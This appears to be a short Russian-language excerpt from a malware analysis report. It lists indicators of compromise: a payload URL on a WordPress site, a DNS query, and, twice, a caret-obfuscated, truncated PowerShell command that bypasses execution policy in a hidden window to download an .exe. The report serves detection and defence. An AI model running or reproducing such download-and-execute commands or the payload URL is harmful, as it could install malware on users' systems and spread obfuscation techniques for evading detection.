Техническая информация
- http://www.clds.it/wp-content/plugins/wp-conf/5xr1trsm/pqiljhqe.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWeRSH^eLl.EXE ^-EXecU^tIOnpOl^icy^ ^BYpass -NO^PrOfILE ^-WIND^ow^sTyL^E^ ^HI^ddEN (Ne^W-^O^b^JECt s^y^St^em^.NEt.^w^EB^CLi^eNT).DoWnlO^A^df^IlE^('http://www.clds.it/wp-...
- 'cl#s.it':80
- http://www.cl#s.it/wp-content/plugins/wp-conf/5Xr1TRSM/pqIljHQE.exe
- DNS ASK cl#s.it
- '<SYSTEM32>\cmd.exe' /C "PoWeRSH^eLl.EXE ^-EXecU^tIOnpOl^icy^ ^BYpass -NO^PrOfILE ^-WIND^ow^sTyL^E^ ^HI^ddEN (Ne^W-^O^b^JECt s^y^St^em^.NEt.^w^EB^CLi^eNT).DoWnlO^A^df^IlE^('http://www.clds.it/wp-...' (со скрытым окном)